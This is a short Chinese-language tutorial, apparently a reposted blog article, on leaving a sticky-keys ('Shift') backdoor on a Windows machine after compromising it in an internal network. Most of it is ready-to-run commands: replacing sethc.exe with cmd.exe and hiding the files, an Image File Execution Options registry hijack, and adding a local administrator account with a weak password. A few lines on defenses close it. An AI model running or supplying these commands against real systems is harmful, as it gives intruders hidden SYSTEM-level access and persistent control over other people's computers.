0x00 前言
通常,在內(nèi)網(wǎng)滲透打下一臺機子之后,可以給這臺機子留個Shift后門。
0x01 Shift后門利用
簡介
粘滯鍵漏洞,在Windows系統(tǒng)下連續(xù)按5下SHIFT鍵,可以啟動系統(tǒng)的粘滯鍵功能,其進程名為Sethc.exe,應(yīng)用程序在Windowssystem32下。
黑客用其它應(yīng)用程序(如:cmd.exe、explorer.exe 或木馬、病毒)將Sethc.exe替換。當(dāng)再次連續(xù)按5次SHIFT鍵,就會啟動黑客替換的應(yīng)用程序,如此便留下了5下SHIFT后門,黑客3389登錄遠(yuǎn)程計算機時,在用戶登錄界面,連續(xù)按5下SHIFT就可以啟動該漏洞,進而控制遠(yuǎn)程計算機。
漏洞原理
在Windows系統(tǒng)登錄界面狀態(tài)下,粘滯鍵仍可以以連續(xù)按5下SHIFT鍵運行,并且此時應(yīng)用程序會以WINDOWS的最高權(quán)限-SYSTEM權(quán)限運行,所以計算機一旦被安裝該后門,入侵者便可悄無聲息地遠(yuǎn)程操縱計算機。
漏洞利用
大致思路如下:
拿到目標(biāo)主機權(quán)限后,到Windowssystem32目錄下,將sethc.exe替換成cmd.exe;
其中,命令行方式為:
copy c:windowssystem32cmd.exe c:windowssystem32sethc.exe copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe attrib c:windowssystem32sethc.exe +h attrib c:windowssystem32dllcachesethc.exe +h
注意:要將dllcache文件夾中的緩存刪掉,否則會自動復(fù)原回去。
注冊表方式為:
REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe" /v Debugger /t REG_SZ /d "C:windowssystem32cmd.exe"
命令說明:reg add是向注冊表添加記錄,后面跟的是注冊表的位置,注意的是HKLM是HKEY_LOCAL_MACHINE的縮寫。Image File Execution Option這個目錄是用來設(shè)置鏡像劫持的,要被劫持的就是命令中的sethc粘滯鍵程序,隨后通過/ v來指定鍵名,其中鍵名debugger是固定的,然后通過/ t來指定REG_SZ字符串類型,最后通過/ d來指定鍵的值,即被惡意替換的程序cmd.exe。
這樣,在下次遠(yuǎn)程連接目標(biāo)主機登錄的時候就可以連續(xù)5下SHIFT觸發(fā)cmd.exe;
可以輸入explorer.exe調(diào)出程序管理系統(tǒng)方便操作;
當(dāng)然,上面的方法存在缺陷,就是可能會導(dǎo)致遠(yuǎn)程連接無法持久進行,因此可以直接添加新用戶便于下次直接登錄:
net user mi1k7ea 123456 /add net localgroup administrators mi1k7ea /add'
防御方法
如果系統(tǒng)盤為NTFS文件系統(tǒng),可以將sytem32下的sethc.exe文件設(shè)為everyone拒絕訪問;
直接將其刪除,最好的方法是在控制面板-輔助功能選項-粘滯鍵選項,將“使用快捷鍵”取消即可。;
通過注冊表設(shè)置實現(xiàn)防御;
審核編輯 :李倩
-
WINDOWS
+關(guān)注
關(guān)注
4文章
3702瀏覽量
94011 -
應(yīng)用程序
+關(guān)注
關(guān)注
38文章
3344瀏覽量
60251 -
Shift
+關(guān)注
關(guān)注
0文章
5瀏覽量
7666
原文標(biāo)題:Windows Shift后門利用
文章出處:【微信號:菜鳥學(xué)安全,微信公眾號:菜鳥學(xué)安全】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。
發(fā)布評論請先 登錄
你的手機在監(jiān)聽!國安部曝光境外芯片可能暗藏“后門”
windows系統(tǒng)的平板找不到SIM卡槽在哪里? 試試這個方法!#三防平板電腦 #工業(yè)平板
從零開始利用NMSIS庫搭建神經(jīng)網(wǎng)絡(luò)(一)
行業(yè)觀察 | Windows 10于本月終止服務(wù)支持,微軟發(fā)布10月高危漏洞更新
工業(yè)場景安全需求升級,RT-Thread 睿賽德全棧方案破解 OS 安全與效率痛點
英偉達(dá)被約談!“后門”風(fēng)險陰影下,人臉識別終端為何選國產(chǎn)芯片
CYBLE-416045_EVAL BLE如何連接到Windows?
國安部:境外產(chǎn)芯片或故意留“后門”
今日看點丨國安部:境外生產(chǎn)芯片可能留“后門” 攝像頭被遠(yuǎn)程開啟;英特爾終止了對 Clear Linux 的支持;宇
國產(chǎn)海光OPS電腦怎樣快速切換windows和國產(chǎn)麒麟統(tǒng)信系統(tǒng)
龍芯處理器支持WINDOWS嗎?
統(tǒng)信Windows應(yīng)用兼容引擎V3.3.0更新
值得體驗的多款Windows on Arm應(yīng)用
如何設(shè)置 Raspberry Pi 操作系統(tǒng) Windows 模擬器:完全指南!
Windows Shift后門利用
評論